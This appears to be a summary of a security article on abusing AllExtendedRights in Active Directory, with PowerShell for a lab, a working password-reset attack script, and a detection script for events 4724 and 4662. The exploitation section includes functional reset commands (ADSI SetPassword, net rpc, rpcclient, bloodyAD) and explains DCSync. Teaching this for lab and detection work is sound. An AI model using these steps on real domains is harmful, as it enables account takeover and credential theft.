Decrypt LOL

Exploitation of DACLs in Active Directory Environments

3 min read

Quick take - Pradnya Pawar's article examines how the AllExtendedRights permission in Active Directory Discretionary Access Control Lists (DACLs) can be abused for privilege escalation and persistence, walks through a lab that reproduces the attack against a user account, and stresses that the same activity has to be detected and mitigated.

Fast Facts

  • The article by Pradnya Pawar explains why AllExtendedRights is a dangerous permission in Active Directory: a principal that holds it can escalate privileges and keep persistent access.
  • It provides a lab setup for simulating the abuse of AllExtendedRights and maps each method to the MITRE ATT&CK framework so the attack vectors can be reasoned about.
  • AllExtendedRights collects every extended right defined on an object: on user objects that includes resetting the password, on computer objects the article uses it for Resource-Based Constrained Delegation (RBCD), and on the domain object it includes the replication rights behind DCSync.
  • The lab requires Windows Server 2019 and tools such as BloodHound and PowerView, and demonstrates how an attacker changes a user's password without knowing the current one.
  • The article stresses that monitoring, detection, and response must cover AllExtendedRights abuse, not just the permission itself.

Exploitation of Discretionary Access Control Lists in Active Directory Environments

Pradnya Pawar, an InfoSec researcher and Security Tech Lead, has published an article examining the exploitation of Discretionary Access Control Lists (DACL) through the AllExtendedRights permission in Active Directory environments. This permission is identified as a significant security risk, allowing attackers to escalate privileges, gain persistent access, and potentially take control of critical directory resources.

Lab Setup and Attack Simulation

The article provides a detailed lab setup designed to simulate attacks using the AllExtendedRights permission. It maps the methods used to the MITRE ATT&CK framework to enhance understanding of attack vectors. Detection mechanisms are outlined to identify suspicious activities related to AllExtendedRights attacks, emphasizing the necessity for effective monitoring and response strategies.

The AllExtendedRights permission grants every extended right (control-access right) defined on an object. Extended rights go beyond ordinary read and write of attributes: they let a principal read confidential attributes or perform specific operations on the object. On User objects this includes User-Force-Change-Password, i.e. resetting the password without knowing the current one; for Computer objects the article uses the permission to set up Resource-Based Constrained Delegation (RBCD). On the domain object itself the extended rights include DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, so a principal holding AllExtendedRights there can request directory replication, including password hashes, exactly as a domain controller would. That technique is known as DCSync.

Setting Up the Active Directory Environment

The proposed lab setup uses Windows Server 2019 for the Active Directory environment. On the attacking side the article uses BloodHound, Samba's net rpc and rpcclient, and BloodyAD from Kali Linux, plus PowerView, which runs in Windows PowerShell. The setup creates two user accounts, Kavish and Geet, and grants Geet AllExtendedRights over Kavish's user object.

Building the environment means installing Windows Server, promoting it to a Domain Controller, setting up the domain, and creating the user accounts from the command line. Once Geet holds AllExtendedRights over Kavish, Geet can reset Kavish's password without knowing the current one. BloodHound shows the resulting edge and confirms Geet's permissions.
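The following PowerShell is an added example, not code from the original article: it creates the two lab users with the ActiveDirectory module and writes the single ACE that BloodHound reports as AllExtendedRights. Assumed values are the default Users container and a lab-only initial password; the script is meant to run on the domain controller as a Domain Admin after promotion.

```powershell
# Added example (not from the original article): create Kavish and Geet, then grant
# Geet AllExtendedRights over Kavish's user object. Assumes the default Users container
# and a lab-only initial password; run on the DC as a Domain Admin after promotion.
Import-Module ActiveDirectory

$domain    = Get-ADDomain
$usersPath = "CN=Users,$($domain.DistinguishedName)"
$initialPw = ConvertTo-SecureString 'LabPassw0rd!' -AsPlainText -Force   # lab-only value

foreach ($name in @('Kavish', 'Geet')) {
    if (-not (Get-ADUser -Filter "SamAccountName -eq '$name'")) {
        New-ADUser -Name $name -SamAccountName $name -Path $usersPath `
                   -AccountPassword $initialPw -Enabled $true
    }
}

$kavish  = Get-ADUser -Identity 'Kavish'
$geet    = Get-ADUser -Identity 'Geet'
$aclPath = "AD:\$($kavish.DistinguishedName)"

# "AllExtendedRights" is one ACE: ActiveDirectoryRights = ExtendedRight with an empty
# ObjectType GUID. A specific GUID would limit the ACE to one control-access right
# (for example only User-Force-Change-Password); the empty GUID grants all of them.
$rights = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$allow  = [System.Security.AccessControl.AccessControlType]::Allow
$ace    = New-Object -TypeName System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $geet.SID, $rights, $allow

$acl = Get-Acl -Path $aclPath
$acl.AddAccessRule($ace)
Set-Acl -Path $aclPath -AclObject $acl

# Verify the DACL the way BloodHound will read it: an ExtendedRight ACE for Geet whose
# ObjectType is the empty GUID.
(Get-Acl -Path $aclPath).Access |
    Where-Object {
        $_.IdentityReference.Value -eq "$($domain.NetBIOSName)\Geet" -and
        $_.ActiveDirectoryRights.HasFlag($rights) -and
        $_.ObjectType -eq [Guid]::Empty
    } |
    Format-Table IdentityReference, ActiveDirectoryRights, ObjectType, AccessControlType
```

The same check is what to run when auditing a production domain: any ExtendedRight ACE with an all-zero ObjectType on a user, computer, or the domain head deserves a justification, because it carries every control-access right at once rather than the one the requester usually needed.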

Exploitation Methods and Security Recommendations

The exploitation step resets Kavish's password from Geet's account with several tools: Samba's net rpc and the rpcclient tool on Linux and other UNIX-like systems, BloodyAD, and, from Windows PowerShell, PowerView's Set-DomainUserPassword cmdlet. None of them needs Kavish's current password.
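The following PowerShell is an added example and not the article's own code: it performs the same reset without PowerView, using the ADSI SetPassword method, which is an administrative reset rather than a change (ChangePassword would need the old password). Assumed values are the DC name dc01.lab.local, the NetBIOS domain LAB, Geet's own password, and Kavish's distinguished name; the new password is a constructed value.

```powershell
# Added example (not from the original article): reset Kavish's password as Geet using
# the ADSI IADsUser.SetPassword reset primitive that AllExtendedRights (via
# User-Force-Change-Password) allows. Kavish's current password is never needed.
# Assumed values: DC dc01.lab.local, domain LAB, Geet's password, Kavish's DN.
$dc       = 'dc01.lab.local'
$attacker = 'LAB\Geet'
$attackPw = 'LabPassw0rd!'          # Geet's own (low-privilege) password
$newPw    = 'Pwn3dByGeet!'          # constructed value chosen by the attacker
$targetDn = 'CN=Kavish,CN=Users,DC=lab,DC=local'

# Bind to the target object with Geet's credentials only; every right exercised below is Geet's.
$entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$dc/$targetDn", $attacker, $attackPw)

# SetPassword is a reset (the DC logs it as event 4724). ChangePassword, the user's
# own path, would require the old password and is logged as 4723.
$entry.Invoke('SetPassword', $newPw)
$entry.CommitChanges()

# Verify: bind as Kavish with the new password. RefreshCache forces the bind and
# throws on a bad credential, so reaching the last line means the reset took effect.
$check = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$dc/$targetDn", 'LAB\Kavish', $newPw)
$check.RefreshCache()
"Reset succeeded, bound as $($check.Properties['distinguishedName'].Value)"
```

The Linux tools named in the article drive the same SAMR password-reset call from Kali: net rpc password kavish, rpcclient's setuserinfo2 kavish 23, and bloodyAD's set password kavish. Whichever path is used, the target's old password is irrelevant, which is exactly why the resulting event on the DC is a reset (4724) and not a change (4723).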

The article underscores the critical importance of implementing detection and mitigation strategies, highlighting the need for organizations to strengthen their security postures against such threats.
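The following PowerShell is an added example, not from the original article, of the detection side: it hunts the domain controller's Security log for the two traces an AllExtendedRights holder leaves, a password reset (event 4724) by an account that is not supposed to reset passwords, and a DCSync replication request (event 4662 carrying the DS-Replication-Get-Changes GUIDs) from anything that is not a domain controller. It assumes the DC audits User Account Management and Directory Service Access (4662 also needs a SACL on the domain object), and the helpdesk allowlist is an assumed value.

```powershell
# Added example (not from the original article): hunt the DC Security log for
# AllExtendedRights abuse. Assumes "Audit User Account Management" and "Audit Directory
# Service Access" are enabled and a SACL exists on the domain object. The allowlist is assumed.
Import-Module ActiveDirectory

function ConvertFrom-EventData {
    # Flatten the <EventData><Data Name="..."> pairs of a Security event into a hashtable.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($n in $xml.Event.EventData.Data) { $data[$n.Name] = $n.'#text' }
    $data
}

$since            = (Get-Date).AddDays(-1)
$allowedResetters = @('LAB\svc_helpdesk')   # assumed: identities allowed to reset passwords

# 1. Password resets. 4724 is logged for an administrative reset, the operation that
#    ForceChangePassword / AllExtendedRights enables; 4723 is a user changing their own
#    password with the old one and is normal. Flag resets by anyone not on the allowlist.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4724; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d = ConvertFrom-EventData $_
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Subject = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            Target  = "$($d['TargetDomainName'])\$($d['TargetUserName'])"
        }
    } |
    Where-Object { $allowedResetters -notcontains $_.Subject } |
    Format-Table -AutoSize

# 2. DCSync. A replication request is audited as 4662 on the domain object with the
#    replication control-access GUIDs in the Properties field. Domain controllers
#    replicate legitimately, so exclude their machine accounts (NAME$).
$replRights = @('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes
                '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2')   # DS-Replication-Get-Changes-All
$dcAccounts = Get-ADDomainController -Filter * | ForEach-Object { "$($_.Name)$" }

Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d     = ConvertFrom-EventData $_
        $props = [string]$d['Properties']
        $hits  = @($replRights | Where-Object { $props -match $_ })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Subject = $d['SubjectUserName']
                Object  = $d['ObjectName']
                Rights  = $hits -join ','
            }
        }
    } |
    Where-Object { $dcAccounts -notcontains $_.Subject } |
    Format-Table -AutoSize
```

In practice the 4662 query is the noisier of the two, so on a domain with Azure AD Connect or a backup product that performs replication, extend the exclusion list with those service accounts rather than widening the time window.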

Original Source: Read the Full Article Here
